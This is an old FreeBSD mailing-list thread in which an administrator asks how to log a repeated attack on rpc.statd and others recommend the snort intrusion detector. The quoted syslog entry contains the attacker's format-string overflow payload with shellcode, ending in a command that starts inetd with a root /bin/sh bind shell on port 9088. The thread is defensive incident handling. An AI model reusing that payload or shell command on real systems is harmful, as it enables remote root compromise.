From owner-freebsd-questions Thu Jan 4 8:36:17 2001 From owner-freebsd-questions@FreeBSD.ORG Thu Jan 4 08:36:11 2001 Return-Path: Delivered-To: freebsd-questions@freebsd.org Received: from cmr1.ash.ops.us.uu.net (cmr1.ash.ops.us.uu.net [198.5.241.39]) by hub.freebsd.org (Postfix) with ESMTP id AAA7237B400 for ; Thu, 4 Jan 2001 08:36:10 -0800 (PST) Received: from imr0.ash.ops.us.uu.net by cmr1.ash.ops.us.uu.net with ESMTP (peer crosschecked as: imr0.ash.ops.us.uu.net [153.39.43.11]) id QQjwnq06832; Thu, 4 Jan 2001 16:36:04 GMT Received: from sysenglt112 by imr0.ash.ops.us.uu.net with SMTP (peer crosschecked as: ippool144-215.corp.us.uu.net [153.39.144.215]) id QQjwnq11056; Thu, 4 Jan 2001 16:34:47 GMT Reply-To: From: "Raymond Hicks" To: "'Guy Helmer'" Cc: , Subject: RE: hack attempt (again) - help Date: Thu, 4 Jan 2001 11:37:32 -0500 Message-ID: <003901c0766c$a3a06fc0$d7902799@sysenglt112> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 In-Reply-To: Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG yes.. i didnt see that suggestion till after I replied... snort is my recommendation as well.. -----Original Message----- From: Guy Helmer [mailto:ghelmer@palisadesys.com] Sent: Thursday, January 04, 2001 10:53 AM To: Raymond Hicks Cc: Eric_Stanfield@kenokozie.com; freebsd-questions@FreeBSD.ORG Subject: RE: hack attempt (again) - help On Thu, 4 Jan 2001, Raymond Hicks wrote: > why dont you just run a sniffer? snort is a sniffer with a lot of good stuff (TM) to find evil things. > -----Original Message----- > From: owner-freebsd-questions@FreeBSD.ORG > [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Guy Helmer > Sent: Thursday, January 04, 2001 10:26 AM > To: Eric_Stanfield@kenokozie.com > Cc: freebsd-questions@FreeBSD.ORG > Subject: Re: hack attempt (again) - help > > > On Thu, 4 Jan 2001 Eric_Stanfield@kenokozie.com wrote: > > > Alright this jerkoff has once again attempted to hack one of my freebsd > > machines by trying what I assume is a buffer overflow to rpc: > > > > Jan 3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon: > > ^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x %08x %08x > > %08x %08x %08x %08x %08x %08x %08x > > > %0242x%n%055x%n%012x%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM- > ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM- > ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM- > ^PëK^M- > > > > v¬M-^Cî M-^M^(M-^CÆ M- ^°M-^Cî M-^M^.M-^CÆ M-^Cà M-^Cë#M- ^´1ÀM-^Cî > > M-^HF'M-^HF*M-^CÆ M-^HF«M- F¸°+, M- óM-^MN¬M-^MV¸ÍM-^@1ÛM- > > Ø@ÍM-^@è°ÿÿÿ/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >> > > /tmp/m; /usr/sbin/inetd /tmp/m; > > > > The interesting bit is what he (she?) is attempting to sneak in at the end > > of the garbage sent to the port. > > > > I've given the system a thorough check and this seems to have been a > second > > failed attempt. I'm now annoyed, however, and would like to be able to at > > least log what address this stuff is originating from. Can anyone > suggest > > something from the ports that would do the trick? I've disabled nfs/rpc > > but I'm sure the hacker will come knocking again. > > snort with a current copy of the rule set from > http://www.whitehats.com/ids/index.html ought to detect this (and lots of > other script kiddie attempts). -- Guy Helmer, Ph.D. Sr. Software Engineer, Palisade Systems --- ghelmer@palisadesys.com http://www.palisadesys.com/~ghelmer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message